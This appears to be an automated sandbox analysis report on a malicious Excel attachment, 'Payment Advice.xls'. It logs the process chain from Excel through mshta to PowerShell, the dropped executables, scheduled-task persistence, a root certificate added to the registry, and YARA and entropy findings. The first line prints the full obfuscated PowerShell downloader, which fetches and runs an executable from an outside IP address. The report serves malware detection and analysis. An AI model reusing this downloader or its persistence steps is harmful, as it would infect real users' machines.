                    Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
                    Source: Yara match File source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: caspol.exe PID: 3888, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: rrwscqkDSNwLK.exe PID: 1644, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: rrwscqkDSNwLK.exe PID: 3576, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: caspol.exe PID: 4076, type: MEMORYSTR
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FE891A022D push eax; iretd 5_2_000007FE891A0241
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FE891A00BD pushad ; iretd 5_2_000007FE891A00C1
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe Code function: 21_2_003A75C0 push eax; retn 0050h 21_2_003A76C9
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe Code function: 28_2_00402AC0 push eax; ret 28_2_00402AD4
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe Code function: 28_2_00402AC0 push eax; ret 28_2_00402AFC
                    Source: C:\Users\user\AppData\Roaming\caspol.exe Code function: 37_2_003775C8 push eax; retn 004Eh 37_2_003776D1
                    Source: caspol[1].exe.5.dr Static PE information: section name: .text entropy: 7.924032890568231
                    Source: caspol.exe.5.dr Static PE information: section name: .text entropy: 7.924032890568231
                    Source: rrwscqkDSNwLK.exe.11.dr Static PE information: section name: .text entropy: 7.924032890568231
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, nv7TQuQu3ElwogYNXj.cs High entropy of concatenated method names: 'kwIsqkQ4Rt', 'Dils45fHjB', 'ksMs07h5L2', 'jwvsQSg7TT', 'iZ9soFlRPV', 'uwusHFFDLN', 'uUqsAweIY5', 'qMDsm13UUL', 'evCs7ibb3u', 'wTQsMLXODh'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, RFaVxJDvsI7VbX0rl8.cs High entropy of concatenated method names: 'd49r8TOJeG', 'qlvrJty0GK', 'IECrVL6mP9', 'wC3rlu6pT8', 'edZrwxKaO9', 'wmsVWJxMJT', 'nJgViubqOf', 'BLHVGX4V2W', 'CUZVuCwxWf', 'XhKVUedFu9'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, LZqk9e1XKPg1FCeZSx.cs High entropy of concatenated method names: 'qaiAP6BRe1', 'CKLAEy28Or', 'ToString', 'a79Ay4JWyw', 'iZ9AJyunmv', 'vndAsDJ3jY', 'NSMAVZ0nYt', 'xwWArQrxVU', 'bbLAlE71L4', 'TknAwZ99eR'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, fDuVmmOK1PX8TL4smgV.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'H9PMXVeJNr', 'ORPMar7pub', 'CmgMf2erEt', 'yfwMtmuVJ4', 'uShMgho4tV', 'LJtMjyo9sR', 'RQ9M1FDccQ'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, EOwDB4zANQSug4vNC0.cs High entropy of concatenated method names: 'RKxM4S846L', 'htBM0fr1ra', 'FC5MQAfoHf', 'b3nMDxvvmJ', 'nSrMnRKqa6', 'U0uMxovn9e', 'oCVMIvbShl', 'RhxMcBhInt', 'YxmMYwyWqs', 'jWFMkmh4YG'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, NQpbydT9UJ3x7aC7ll.cs High entropy of concatenated method names: 'm9VlYVZ779', 'hYflkxHXKq', 'JiplSH36wp', 'ipVlq3aL8m', 'SaTl9VKKM6', 'Qrol4dQSrb', 'ppNlRTTVw8', 'QPjl0OQUjS', 'sdLlQKPNNu', 'hEvlpFBNnE'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, zHSLcC0xi2VDKUoIki.cs High entropy of concatenated method names: 'gqJJt8bpuy', 'chKJgb7VEy', 'fGYJj3jxDJ', 'S8eJ1vvNHX', 'yxrJWbgDoI', 'nKfJi7EYZM', 'kTfJGMHELS', 'jdaJuGbQWu', 'HUQJUSCJAx', 'DMWJ5fVkdg'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, l7WCInZ4VPxOCXSEYv.cs High entropy of concatenated method names: 'uL8SyuRtP', 'XQ5qnBGp5', 'fdv4KayTV', 'LQZRvMkyl', 'YMWQCB5d3', 'S7xpO8Hqe', 'YlWl3430BFBwncwUKJ', 'GJ4bQqB12ORsZ5dlg2', 'wtimS54KW', 'tdvMDXOFW'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, ejA9J2OOLcg6cn7VOAK.cs High entropy of concatenated method names: 'OliM5DXEsC', 'LQcMzYbHH4', 'biC3K1MhMe', 'Vgh3OkW19w', 'MyP3Z30MJ1', 'nxD3v3Z1Hj', 'N8L32EXWAv', 'xfj38y71Oe', 'CxC3yJkXsk', 'n6q3JBPlnf'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, WGVBOO5rrSDsqq28a0.cs High entropy of concatenated method names: 'zxWMsyqmcO', 'xBKMVLK3DL', 'OJEMro5MhQ', 'iyNMltsAmf', 'h2NM7cDQHY', 'Vf3MwJCXCH', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, naonpTtnkvVd0Lx6yR.cs High entropy of concatenated method names: 'fBHoeor5eG', 'p8NoaXobKn', 'gx7otaahjZ', 'CesoglZWn0', 'pxBonEa9WU', 'hEOoBvCaUi', 'X5Joxp8qkk', 'AgMoIqcqpl', 'INRoF0mfpu', 'EbNoChpdo5'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, hhkxhSpONosID7AIZ0.cs High entropy of concatenated method names: 'OLJV9igeke', 'pCmVRHUUtn', 'DFHsBemItd', 'setsxdwdlk', 'B1fsIM1RWN', 'hnfsFVgF04', 'icGsC6ScTJ', 'Bv2sdZtYj7', 'c83sT8mac4', 'Aeyse4DYml'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, a6RnQjwUyOApqVRoTt.cs High entropy of concatenated method names: 'GDqv8AQAo0', 'fPWvyw8Gev', 'MilvJcAcrX', 'z6nvsm1HU7', 'GU4vVVp25E', 'P9pvrwHp48', 'ddvvlRvm5B', 'm24vwt17DP', 'VUjvLPeI9X', 'S8lvP4GFHc'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, IJUcGuiXoH6oteQitt.cs High entropy of concatenated method names: 'W9UAuehVRC', 'F3KA5Ahfle', 'rDCmK6FGoM', 'ENNmOiijkn', 'zFsAXpti6F', 'dAUAa7vK0N', 'H06AfOrhMg', 's5cAtgGihI', 'A1IAgVkTbX', 'r7uAjEfmeo'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, L4oEi92lLXbHukyhd4.cs High entropy of concatenated method names: 'e5SOlHSLcC', 'Ii2OwVDKUo', 'Wu3OPElwog', 'xNXOEjshkx', 'sAIOoZ0tFa', 'ixJOHvsI7V', 'LCAAOqUlND4diNBGEF', 'U1gjSgECcjRPEDjs6U', 'KrWOOkBTyH', 'jZeOv3QYL3'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, da1BCSJJ6wrPB4DfAI.cs High entropy of concatenated method names: 'Dispose', 'w4DOU0Ajbi', 'RuEZnReX0k', 'z9kPDVvpk9', 'WpKO5e0Vxg', 'j4sOzjC67c', 'ProcessDialogKey', 'ayoZK0va9o', 'gbAZOZ05HB', 'TPyZZGGVBO'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, vjZivjf2CXinRayulp.cs High entropy of concatenated method names: 'PF2h02Yl7c', 'A4jhQudmOX', 'D5MhDdOESN', 'uYOhnVtpef', 'L0YhxJhSOS', 'WCMhIslmlM', 'uVyhCGShPX', 'b9BhdL5ilR', 'stYhe5Urux', 't2nhXQ7PEE'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, ISvCPyGxpb4D0AjbiG.cs High entropy of concatenated method names: 'dKf7oIul6p', 'LRQ7AGZEjR', 'SG377p98xG', 'ppL73NuNCl', 'LHc7NMKubp', 'edC7cv9I79', 'Dispose', 'pXhmy2gEAK', 'wV7mJqTe3d', 'HaXmsHYu5o'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, DgHiCnCAXew4U8UW26.cs High entropy of concatenated method names: 'YhElyvaAWh', 'DUDlsyoEtP', 'kSOlrjUqwV', 'S2ar5PtZee', 'GITrzURRs1', 'QZYlKJfo8c', 'CVGlOLDgrK', 'BpmlZ6xQng', 'X9Glv89kE8', 'RL1l21qZa0'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, o0va9oUJbAZ05HB1Py.cs High entropy of concatenated method names: 'dFL7DtW72v', 'BNm7nNf6Rx', 'Nsl7BnCfx6', 'CQF7xqpOIG', 'Ms37ItQKef', 'hBL7FphnQ1', 'mMn7CGROo3', 'qph7dhisEq', 'GWV7TBkMaq', 'BYo7excHLu'

                    Persistence and Installation Behavior

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\caspol.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe
                    Source: C:\Users\user\AppData\Roaming\caspol.exe File created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe File created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)

                    Boot Survival

                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp"
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Process information set: NOGPFAULTERRORBOX
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process information set: NOOPENFILEERRORBOX
                    Source: Payment Advice.xls | Stream path 'MBD001C4526/Package' entropy: 7.99631060239 (max. 8.0)
                    Source: Payment Advice.xls | Stream path 'Workbook' entropy: 7.99861998161 (max. 8.0)
                    Source: ~DF6CCF4596F2406470.TMP.0.dr | Stream path 'Package' entropy: 7.9944184592 (max. 8.0)
                    Source: CA430000.0.dr | Stream path 'MBD001C4526/Package' entropy: 7.9944184592 (max. 8.0)
                    Source: CA430000.0.dr | Stream path 'Workbook' entropy: 7.99808964338 (max. 8.0)
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Memory allocated: 380000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Memory allocated: 2360000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Memory allocated: 590000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Memory allocated: 5A40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Memory allocated: 5510000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Memory allocated: 6A40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Memory allocated: 7A40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Memory allocated: 1C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Memory allocated: 2590000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Memory allocated: 1C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Memory allocated: 58C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Memory allocated: 5440000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Memory allocated: 68C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Memory allocated: 78C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Memory allocated: 2C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Memory allocated: 2580000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Memory allocated: 2C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Memory allocated: 5950000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Memory allocated: 6950000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Memory allocated: 6A90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Memory allocated: 7A90000 memory reserve | memory write watch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_000007FE89273122 rdtsc 5_2_000007FE89273122
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\caspol.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\caspol.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1953
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4594
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6121
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3640
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2363
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2093
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1481
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2143
